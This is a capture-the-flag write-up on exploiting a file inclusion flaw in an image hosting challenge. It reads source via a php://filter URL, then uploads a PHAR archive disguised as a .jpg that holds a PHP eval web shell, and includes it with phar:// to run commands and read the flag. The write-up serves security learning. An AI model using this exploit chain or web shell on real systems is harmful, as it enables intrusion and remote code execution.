We are given an image hosting service where we can upload our own files. We notice that the pages are accessed through a page parameter to index.php, which may point to a file inclusion vuln.
Using a php:// URL for the page confirms our suspicions:
http://54.65.205.135/owlur/index.php?page=php://filter/convert.base64-encode/resource=./upload
We can use this to download source for all the pages. Notice that the script is appending .php to the path automatically (can confirm this by noting that e.g. upload.php exists in the root).
Null bytes aren't working to suppress this appending, and http and ftp URLs are banned, so we have to try including a local file. We can upload .jpgs but those have the wrong extension.
We browse the list of accepted protocols and see a weird one called phar. The documentation even notes that
The phar stream wrapper does not operate on remote files, and cannot operate on remote files, and so is allowed even when the
allow_url_fopenandallow_url_includeINI options are disabled.
Great! So if we construct a PHAR file which contains our shellcode, and rename it to jpg then we get remote code execution.
From here it's easy to build the PHAR:
<?php
$context = stream_context_create(array('phar' => array('compress' => Phar::GZ)));
file_put_contents('phar://test.phar/z.php', '<'.'?php
eval($_GET["code"]);
?'.'>', 0, $context);
?>
and then run it:
http://54.65.205.135/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/bznAQAd.jpg/z&code=echo%20file_get_contents%28%27/OWLUR-FLAG.txt%27%29;
(Note that the owlur-upload-zzzzzz path was obtained by reading the upload.php source we exfiltrated).